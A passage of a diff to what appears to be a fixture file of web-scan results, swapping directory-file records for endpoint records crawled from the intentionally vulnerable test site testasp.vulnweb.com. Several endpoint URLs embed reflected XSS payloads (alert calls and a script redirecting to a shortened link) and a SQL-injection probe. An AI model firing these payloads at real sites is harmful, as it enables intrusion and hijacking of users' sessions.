"startScan.endpoint", + "pk": 329, "fields": { - "length": 143, - "lines": 5, + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Search.asp?tfSearch==%3Cscript%3Elocation.href=%22http://goo.gl/z4LTEG%22;%3C%2Fscript%3E", + "content_length": 3209, + "page_title": "acuforum search", "http_status": 200, - "words": 13, - "name": "LmlkZWEvc2NvcGVzL3Njb3BlX3NldHRpbmdzLnhtbA==", - "url": "http://testphp.vulnweb.com/.idea/scopes/scope_settings.xml", - "content_type": "text/xml" + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:48.570Z", + "response_time": 0.343603225, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.directoryfile", - "pk": 21, + "model": "startScan.endpoint", + "pk": 330, "fields": { - "length": 266, - "lines": 9, + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Search.asp?tfSearch=Mert", + "content_length": 2964, + "page_title": "acuforum search", "http_status": 200, - "words": 18, - "name": "LmlkZWEvbWlzYy54bWw=", - "url": "http://testphp.vulnweb.com/.idea/misc.xml", - "content_type": "text/xml" + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:48.704Z", + "response_time": 0.343923657, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.directoryfile", - "pk": 22, + "model": "startScan.endpoint", + "pk": 331, "fields": { - "length": 173, - "lines": 8, + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Search.asp?tfSearch=MertXSS", + "content_length": 2973, + "page_title": "acuforum search", "http_status": 200, - "words": 16, - "name": "LmlkZWEvdmNzLnhtbA==", - "url": "http://testphp.vulnweb.com/.idea/vcs.xml", - "content_type": "text/xml" + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:55.624Z", + "response_time": 0.349199582, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.directoryfile", - "pk": 23, + "model": "startScan.endpoint", + "pk": 332, "fields": { - "length": 12473, - "lines": 217, + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Search.asp?tfsearch=a", + "content_length": 2955, + "page_title": "acuforum search", "http_status": 200, - "words": 1702, - "name": "LmlkZWEvd29ya3NwYWNlLnhtbA==", - "url": "http://testphp.vulnweb.com/.idea/workspace.xml", - "content_type": "text/xml" + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:55.763Z", + "response_time": 0.356213068, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.directoryfile", - "pk": 24, + "model": "startScan.endpoint", + "pk": 335, "fields": { - "length": 400, - "lines": 9, + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Templates/MainTemplate.dwt.asp", + "content_length": 2488, + "page_title": "Untitled Document", "http_status": 200, - "words": 122, - "name": "X21tU2VydmVyU2NyaXB0cy8=", - "url": "http://testphp.vulnweb.com/_mmServerScripts/", - "content_type": "text/html" + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:56.104Z", + "response_time": 0.356833701, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.directoryfile", - "pk": 25, + "model": "startScan.endpoint", + "pk": 336, "fields": { - "length": 93, - "lines": 1, - "http_status": 200, - "words": 4, - "name": "X21tU2VydmVyU2NyaXB0cy9NTUhUVFBEQi5waHA=", - "url": "http://testphp.vulnweb.com/_mmServerScripts/MMHTTPDB.php", - "content_type": "text/html; charset=UTF-8" + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Templatize.asp", + "content_length": 1208, + "page_title": "500 - Internal server error.", + "http_status": 500, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:56.210Z", + "response_time": 0.350699016, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.directoryfile", - "pk": 26, + "model": "startScan.endpoint", + "pk": 338, "fields": { - "length": 262, - "lines": 8, + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Templatize.asp?item=html/about.html", + "content_length": 4594, + "page_title": "Untitled Document", "http_status": 200, - "words": 66, - "name": "YWRtaW4v", - "url": "http://testphp.vulnweb.com/admin/", - "content_type": "text/html" + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:56.421Z", + "response_time": 0.355394754, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.directoryfile", - "pk": 27, + "model": "startScan.endpoint", + "pk": 342, "fields": { - "length": 224, - "lines": 5, + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/avatars/noavatar.gif", + "content_length": 950, + "page_title": null, "http_status": 200, - "words": 8, - "name": "Y3Jvc3Nkb21haW4ueG1s", - "url": "http://testphp.vulnweb.com/crossdomain.xml", - "content_type": "text/xml" + "content_type": "image/gif", + "discovered_date": "2024-11-13T02:16:56.853Z", + "response_time": 0.353538523, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.directoryfile", - "pk": 28, + "model": "startScan.endpoint", + "pk": 344, "fields": { - "length": 595, - "lines": 11, + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/html/about.html", + "content_length": 1995, + "page_title": null, "http_status": 200, - "words": 262, - "name": "Q1ZTLw==", - "url": "http://testphp.vulnweb.com/CVS/", - "content_type": "text/html" + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:57.074Z", + "response_time": 0.341017678, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.directoryfile", - "pk": 29, + "model": "startScan.endpoint", + "pk": 346, "fields": { - "length": 1, - "lines": 1, + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/robots.txt", + "content_length": 13, + "page_title": null, "http_status": 200, - "words": 2, - "name": "Q1ZTL0VudHJpZXM=", - "url": "http://testphp.vulnweb.com/CVS/Entries", - "content_type": "application/octet-stream" + "content_type": "text/plain", + "discovered_date": "2024-11-13T02:16:57.291Z", + "response_time": 0.180925045, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.directoryfile", - "pk": 30, + "model": "startScan.endpoint", + "pk": 347, "fields": { - "length": 1, - "lines": 1, + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/rpb.png", + "content_length": 40, + "page_title": null, "http_status": 200, - "words": 2, - "name": "Q1ZTL1Jvb3Q=", - "url": "http://testphp.vulnweb.com/CVS/Root", - "content_type": "application/octet-stream" + "content_type": "image/png", + "discovered_date": "2024-11-13T02:16:57.405Z", + "response_time": 0.349029182, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.directoryfile", - "pk": 31, + "model": "startScan.endpoint", + "pk": 348, "fields": { - "length": 894, - "lines": 4, + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/search.asp?tfSearch=%3Cscript%3Ealert(1);%20//&tfSearch=%3C/script%3E", + "content_length": 4289, + "page_title": "acuforum search", "http_status": 200, - "words": 2, - "name": "ZmF2aWNvbi5pY28=", - "url": "http://testphp.vulnweb.com/favicon.ico", - "content_type": "image/x-icon" + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:57.544Z", + "response_time": 0.351042462, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.directoryfile", - "pk": 32, + "model": "startScan.endpoint", + "pk": 349, "fields": { - "length": 377, - "lines": 9, + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/search.asp?tfSearch=%3Cscript%3Ealert(1)&tfSearch=alert(2)%3C/script%3E", + "content_length": 4289, + "page_title": "acuforum search", "http_status": 200, - "words": 128, - "name": "aW1hZ2VzLw==", - "url": "http://testphp.vulnweb.com/images/", - "content_type": "text/html" + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:57.667Z", + "response_time": 0.366399991, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.directoryfile", - "pk": 33, + "model": "startScan.endpoint", + "pk": 350, "fields": { - "length": 3265, - "lines": 91, + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/search.asp?tfSearch=%3Cscript%3Ealert(1);%20var%20x=[''&tfSearch=''];%3C/script%3E", + "content_length": 4354, + "page_title": "acuforum search", "http_status": 200, - "words": 350, - "name": "aW5kZXguYmFr", - "url": "http://testphp.vulnweb.com/index.bak", - "content_type": "application/octet-stream" + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:57.789Z", + "response_time": 0.361979432, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.directoryfile", - "pk": 34, + "model": "startScan.endpoint", + "pk": 352, "fields": { - "length": 4958, - "lines": 110, + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/showforum.asp", + "content_length": 132, + "page_title": "Object moved", + "http_status": 302, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:58.020Z", + "response_time": 0.343268156, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 353, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/showforum.asp?id=1", + "content_length": 3077, + "page_title": "acuforum Weather", "http_status": 200, - "words": 514, - "name": "aW5kZXgucGhw", - "url": "http://testphp.vulnweb.com/index.php", - "content_type": "text/html; charset=UTF-8" + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:58.156Z", + "response_time": 0.353022668, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.directoryfile", - "pk": 35, + "model": "startScan.endpoint", + "pk": 354, "fields": { - "length": 2586, - "lines": 2, + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/showforum.asp?id=0+and+1=1--%5BTrue%5D", + "content_length": 3687, + "page_title": "acuforum Acunetix Web Vulnerability Scanner", "http_status": 200, - "words": 9, - "name": "aW5kZXguemlw", - "url": "http://testphp.vulnweb.com/index.zip", - "content_type": "application/zip" + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:58.270Z", + "response_time": 0.34797882700000005, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.directoryfile", - "pk": 36, + "model": "startScan.endpoint", + "pk": 355, "fields": { - "length": 5523, - "lines": 120, + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/showforum.asp?id=0", + "content_length": 4113, + "page_title": "acuforum Acunetix Web Vulnerability Scanner", "http_status": 200, - "words": 557, - "name": "bG9naW4ucGhw", - "url": "http://testphp.vulnweb.com/login.php", - "content_type": "text/html; charset=UTF-8" + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:58.401Z", + "response_time": 0.355770068, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.directoryfile", - "pk": 37, + "model": "startScan.endpoint", + "pk": 356, "fields": { - "length": 268, - "lines": 8, + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/showforum.asp?id=2", + "content_length": 2933, + "page_title": "acuforum Miscellaneous", "http_status": 200, - "words": 60, - "name": "dmVuZG9yLw==", - "url": "http://testphp.vulnweb.com/vendor/", - "content_type": "text/html" + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:58.521Z", + "response_time": 0.349096817, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 357, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/showthread.asp", + "content_length": 132, + "page_title": "Object moved", + "http_status": 302, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:58.642Z", + "response_time": 0.35839657799999997, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 358, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/showthread.asp?id=0", + "content_length": 3172, + "page_title": "acuforumMr.", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:58.748Z", + "response_time": 0.353343697, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 359, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/showthread.asp?id=1", + "content_length": 3058, + "page_title": "acuforumMr.", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:58.864Z", + "response_time": 0.352751115, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 360, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/showthread.asp?id=10", + "content_length": 1208, + "page_title": "500 - Internal server error.", + "http_status": 500, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:58.980Z", + "response_time": 0.34059552200000004, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 361, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/showthread.asp?id=11", + "content_length": 1208, + "page_title": "500 - Internal server error.", + "http_status": 500, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:17:05.981Z", + "response_time": 0.353744706, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 362, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/showthread.asp?id=12", + "content_length": 1208, + "page_title": "500 - Internal server error.", + "http_status": 500, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:17:06.148Z", + "response_time": 0.349278383, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 363, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/showthread.asp?id=13", + "content_length": 1208, + "page_title": "500 - Internal server error.", + "http_status": 500, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:17:06.271Z", + "response_time": 0.352656007, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 364, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/showthread.asp?id=14", + "content_length": 1208, + "page_title": "500 - Internal server error.", + "http_status": 500, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:17:06.387Z", + "response_time": 0.343418726, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 365, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/showthread.asp?id=15", + "content_length": 1208, + "page_title": "500 - Internal server error.", + "http_status": 500, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:17:06.522Z", + "response_time": 0.34977255, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 366, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/showthread.asp?id=18", + "content_length": 1208, + "page_title": "500 - Internal server error.", + "http_status": 500, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:17:06.665Z", + "response_time": 0.344398841, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 367, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/showthread.asp?id=20", + "content_length": 1208, + "page_title": "500 - Internal server error.", + "http_status": 500, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:17:06.801Z", + "response_time": 0.339310981, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 368, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/showthread.asp?id=19", + "content_length": 1208, + "page_title": "500 - Internal server error.", + "http_status": 500, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:17:06.938Z", + "response_time": 0.34787245899999997, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 369, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/showthread.asp?id=17", + "content_length": 1208, + "page_title": "500 - Internal server error.", + "http_status": 500, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:17:07.080Z", + "response_time": 0.35722255799999997, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 370, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/showthread.asp?id=2", + "content_length": 3056, + "page_title": "acuforumMr.", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:17:07.203Z", + "response_time": 0.349250248, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 371, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/showthread.asp?id=21", + "content_length": 1208, + "page_title": "500 - Internal server error.", + "http_status": 500, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:17:07.338Z", + "response_time": 0.35278610200000005, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 372, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/showthread.asp?id=22", + "content_length": 1208, + "page_title": "500 - Internal server error.", + "http_status": 500, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:17:07.453Z", + "response_time": 0.358922994, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 373, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/showthread.asp?id=24", + "content_length": 1208, + "page_title": "500 - Internal server error.", + "http_status": 500, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:17:07.565Z", + "response_time": 0.356453631, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 374, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/showthread.asp?id=23", + "content_length": 1208, + "page_title": "500 - Internal server error.", + "http_status": 500, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:17:07.677Z", + "response_time": 0.35163542999999997, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 375, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/showthread.asp?id=25", + "content_length": 1208, + "page_title": "500 - Internal server error.", + "http_status": 500, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:17:07.779Z", + "response_time": 0.35620865700000004, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 376, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/showthread.asp?id=26", + "content_length": 1208, + "page_title": "500 - Internal server error.", + "http_status": 500, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:17:07.884Z", + "response_time": 0.349108139, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 377, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/showthread.asp?id=27", + "content_length": 1208, + "page_title": "500 - Internal server error.", + "http_status": 500, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:17:07.986Z", + "response_time": 0.356647332, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 378, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/showthread.asp?id=28", + "content_length": 1208, + "page_title": "500 - Internal server error.", + "http_status": 500, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:17:08.108Z", + "response_time": 0.349999685, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 379, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/showthread.asp?id=29", + "content_length": 1208, + "page_title": "500 - Internal server error.", + "http_status": 500, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:17:08.223Z", + "response_time": 0.351240993, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 380, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/showthread.asp?id=3", + "content_length": 3062, + "page_title": "acuforumMr.", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:17:08.335Z", + "response_time": 0.362544572, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 381, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/showthread.asp?id=4", + "content_length": 1208, + "page_title": "500 - Internal server error.", + "http_status": 500, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:17:08.459Z", + "response_time": 0.34530510600000003, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 382, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/showthread.asp?id=41", + "content_length": 1208, + "page_title": "500 - Internal server error.", + "http_status": 500, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:17:08.610Z", + "response_time": 0.34533241400000003, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 383, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/showthread.asp?id=46", + "content_length": 1208, + "page_title": "500 - Internal server error.", + "http_status": 500, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:17:08.714Z", + "response_time": 0.345845734, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 384, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/showthread.asp?id=45", + "content_length": 1208, + "page_title": "500 - Internal server error.", + "http_status": 500, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:17:08.817Z", + "response_time": 0.354001962, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 385, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/showthread.asp?id=48", + "content_length": 1208, + "page_title": "500 - Internal server error.", + "http_status": 500, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:17:08.922Z", + "response_time": 0.349480573, + "webserver": "Microsoft-IIS/8.5", 